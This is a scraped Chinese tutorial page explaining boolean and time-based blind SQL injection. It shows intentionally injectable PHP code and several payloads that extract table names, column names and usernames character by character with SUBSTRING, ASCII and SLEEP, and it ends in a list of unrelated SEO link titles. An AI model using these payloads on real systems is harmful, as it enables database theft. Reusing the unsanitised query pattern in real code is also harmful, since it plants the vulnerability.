当前位置: 首页 > wzjs >正文

福建网站建建设方案网站安全检测在线

wzjs 2025/8/11 2:28:15
福建网站建建设方案,网站安全检测在线,oneup wordpress,wordpress 显示页码一. 布尔盲注 布尔盲注是通过观察应用程序的响应&#xff08;如HTTP 状态码等&#xff09;来判断查询条件是否为真。 1.进行数据库配置连接 <?php // 数据库连接配置 $host localhost; $dbname testdb; $user root; $password password;$conn new mysqli($host, $us…

一. 布尔盲注
布尔盲注是通过观察应用程序的响应(如HTTP 状态码等)来判断查询条件是否为真。

1.进行数据库配置连接
<?php
// 数据库连接配置
$host = 'localhost';
$dbname = 'testdb';
$user = 'root';
$password = 'password';$conn = new mysqli($host, $user, $password, $dbname);if ($conn->connect_error) {die("Connection failed: " . $conn->connect_error);
}// 获取用户输入的参数
$id = $_GET['id'];
2.构造布尔盲注查询
$query = "SELECT * FROM users WHERE id = $id AND 1=1";$result = $conn->query($query);
3.返回查询结果
if ($result->num_rows > 0) {echo "Query is TRUE (数据存在)";
} else {echo "Query is FALSE (数据不存在)";
}// 关闭连接
$conn->close();
?>
4.攻击者可以通过修改 `id` 参数,一点点推断数据库信息

获取表名:

sqlid=1 AND (SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1)='a'


获取列名:

sqlid=1 AND (SELECT SUBSTRING(column_name,1,1) FROM information_schema.columns WHERE table_name='users' LIMIT 1)='u'


获取数据:

sqlid=1 AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='a'

二. 时间盲注
时间盲注是通过在 SQL 查询中插入时间延迟函数(如 `SLEEP()`),根据数据库响应时间来判断查询条件是否为真。

1.数据库配置连接与布尔盲注相同
2.构造时间盲注查询
$query = "SELECT * FROM users WHERE id = $id AND IF(1=1, SLEEP(5), 0)";
$start_time = microtime(true); // 开始时间
$result = $conn->query($query);
$end_time = microtime(true); // 结束时间
3. 计算查询耗时
$query_time = $end_time - $start_time;
4.根据查询时间判断结果
if ($query_time > 5) {echo "Query is TRUE (延迟 5 秒)";
} else {echo "Query is FALSE (无延迟)";
}
// 关闭连接
$conn->close();
?>
5.攻击者可以通过修改 `id` 参数,逐步推断数据库信息

获取表名:

sqlid=1 AND IF(ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1),1,1))=97, SLEEP(5), 0)


获取列名:

sqlid=1 AND IF(ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1),1,1))=117, SLEEP(5), 0)


获取数据: 

sqlid=1 AND IF(ASCII(SUBSTRING((SELECT username FROM users LIMIT 1),1,1))=97, SLEEP(5), 0)

三.获取表,列,具体数据的函数

1:获取表名

使用布尔盲注或时间盲注,逐个字符推断表名。
 

sqlid=1 AND ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1 OFFSET 0),1,1))=97

 

2:获取列名

使用布尔盲注或时间盲注,逐个字符推断列名。
 

sqlid=1 AND ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1 OFFSET 0),1,1))=117
3:获取数据
sqlid=1 AND ASCII(SUBSTRING((SELECT username FROM users LIMIT 1 OFFSET 0),1,1))=97
http://www.dtcms.com/wzjs/285296.html

相关文章:

  • 网站搜索引擎优化工具seo模板建站
  • 网站怎么换域名怎么发帖子做推广
  • 网站建设需要版块网站优化助手
  • 网站建设关键要做好哪些百度推广客服投诉电话
  • 好看的页面布局优化的含义是什么
  • 做网站有哪个软件好搜索引擎优化的工具
  • 阿里云虚拟主机建网站沈阳网站seo公司
  • 鹤壁做网站公司电话最新国内新闻重大事件
  • frog 网站建设沈阳seo排名收费
  • 萍乡企业网站制作站长统计app最新版本2023
  • 包头做网站哪家好南宁seo手段
  • 食品配送做网站需要什么功能在线优化网站
  • 企业网站建设毕业设计seo视频教程我要自学网
  • 网站建设投资资金佛山seo
  • 用AIDE怎么建设网站seo站长平台
  • wordpress主机配置seo自然排名优化
  • 免费图片制作网站模板新媒体运营是做什么
  • 如何推广网站平台seo营销专员
  • 温州网凝科技有限公司百度网站免费优化软件下载
  • 邢台装修网站建设论坛seo招聘
  • 动漫电影做英语教学视频网站有哪些广州seo网站推广公司
  • h5网站做微信公众号白酒营销策划方案
  • 免费高清视频会议软件seo入门黑帽培训教程
  • 南京网站设计公司排名专业做加盟推广的公司
  • 河南省建设厅网站师林峰广州seo托管
  • cpa网站怎么做广告代理商
  • vs网站搜索栏怎么做个人网页怎么做
  • 湛江哪里有建网站做网络推广需要多少钱
  • 郑州做网站九零后网络西安网站建设公司电话
  • 视频网站开发技术书seo是做什么的